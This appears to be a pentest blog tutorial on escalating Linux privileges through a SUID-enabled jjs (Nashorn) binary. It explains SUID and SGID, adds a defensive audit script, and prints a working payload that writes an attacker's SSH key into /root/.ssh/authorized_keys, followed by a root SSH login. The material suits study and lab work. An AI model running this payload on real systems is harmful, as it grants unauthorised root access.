PRIVILEGE ESCALATION (LINUX) – JJS

Description: JJS is an acronym for ‘java java script’. jjs is the command-line tool that invokes the ‘Nashorn’ engine; it is the recommended tool, created specifically for Nashorn. To evaluate a script file with Nashorn, pass the name of the script file to the jjs tool.

What is the Nashorn engine?

Nashorn is a high-performance JavaScript engine written in Java. It lets a developer execute JavaScript from Java and vice versa. After Java SE 7, Nashorn became the official JavaScript engine, and all JDKs ship with it. Nashorn implements the ECMAScript 5.1 specification.

  • Nashorn lets a developer add scripting support to an application: the end user can quickly modify the product without recompiling the whole Java application.
  • Developers can use Nashorn to run JavaScript code on the server without rewriting the business logic. For example, client-side input-validation code can be reused on the server side because the business logic stays the same.

How is it possible?

Privileges can be elevated when the jjs binary has the SUID or SGID bit set. This is simply a misconfigured permission, and it leads to privilege escalation.

What is SUID?

SUID (Set owner User ID upon execution) is a special type of file permission given to a file. Normally in Linux/Unix, when a program runs it inherits the access permissions of the logged-in user. SUID gives a user temporary permission to run a program/file with the permissions of the file owner rather than those of the user who runs it. In simple words, users get the file owner’s permissions, as well as the owner’s UID and GID, when executing that file/program/command.

What is SGID?

SGID (Set Group ID upon execution) is a special type of file permission given to a file/folder. Normally in Linux/Unix, when a program runs it inherits the access permissions of the logged-in user. SGID gives a user temporary permission to run a program/file with the permissions of the file’s group, i.e. the user effectively becomes a member of that group while executing the file. In simple words, users get the file group’s permissions when executing a folder/file/program/command.

SGID is similar to SUID. The difference is that SUID assumes the file owner’s permissions while SGID assumes the group’s permissions when executing a file, instead of the permissions inherited from the logged-in user.

How to identify?

Run an automated script such as LinEnum.sh or linpeas.sh, or search the filesystem directly: “$ find / -perm -4000 -type f 2>/dev/null” for SUID files and “$ find / -perm -2000 -type f 2>/dev/null” for SGID files. (The older “-perm +4000” spelling is rejected by current GNU find; use “-4000” or “/4000” instead.)
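As an added example (not part of the original post and not GTFOBins code), the following POSIX shell helper turns the two find commands above into a repeatable audit: it lists setuid/setgid files under a directory tree, flags the ones whose name should never carry those bits (only jjs, from this post, is listed; RISKY_NAMES is a local policy you extend yourself), and optionally clears the bits as the mitigation. All function names and the RISKY_NAMES variable are this example’s own assumptions.

```shell
#!/bin/sh
# Added audit helper, not part of the original post or of GTFOBins.
# Enumerates setuid/setgid files under a directory tree and flags
# interpreters that should never carry those bits. Uses only POSIX
# find/chmod/basename. 'jjs' comes from the post; any other name you
# add to RISKY_NAMES is your own local policy.

RISKY_NAMES="jjs"

# Print every regular file under $1 that has the setuid or setgid bit set.
# "-perm -4000" / "-perm -2000" is the portable form; the old "+4000"
# syntax is rejected by current GNU find.
list_special_bits() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Succeed (exit 0) when the basename of $1 is listed in RISKY_NAMES.
is_risky_name() {
    base=$(basename "$1")
    for n in $RISKY_NAMES; do
        [ "$base" = "$n" ] && return 0
    done
    return 1
}

# Print the special-bit files under $1 whose name is in RISKY_NAMES.
risky_special_bits() {
    list_special_bits "$1" | while IFS= read -r f; do
        if is_risky_name "$f"; then printf '%s\n' "$f"; fi
    done
}

# Print how many risky files were found (0 is the expected baseline).
count_risky() {
    risky_special_bits "$1" | wc -l | tr -d ' '
}

# Mitigation: strip setuid and setgid from every risky file under $1.
# Re-run count_risky afterwards; it should print 0.
fix_risky() {
    risky_special_bits "$1" | while IFS= read -r f; do
        chmod u-s,g-s "$f" && printf 'cleared special bits on %s\n' "$f"
    done
}

# Usage when run directly:  ./suid_audit.sh /  [fix]
if [ "${1:-}" ]; then
    [ "${2:-}" = "fix" ] && fix_risky "$1"
    risky_special_bits "$1"
fi
```

Running it against “/” as root reports any flagged interpreter; pass “fix” as the second argument to clear the bits, then re-run to confirm the count is back to zero.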

Time to exploit!!!

I found a very effective and great script written by “gtfobins”; the link is given below.

https://gtfobins.github.io/gtfobins/jjs/

Basically we are elevating privileges with the “gtfobins” script by writing into the ‘/root/.ssh’ folder.

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("<public key>");
fw.close();' | jjs

Copy and paste the above code into a file named “test.sh”.

Execute “test.sh” on the target machine.

Login with your private key.

  • Syntax: ssh -i <private key> username@host-ip
  • Example: ssh -i id_rsa root@10.10.10.162

We have successfully exploited the misconfigured ‘jjs’ tool.
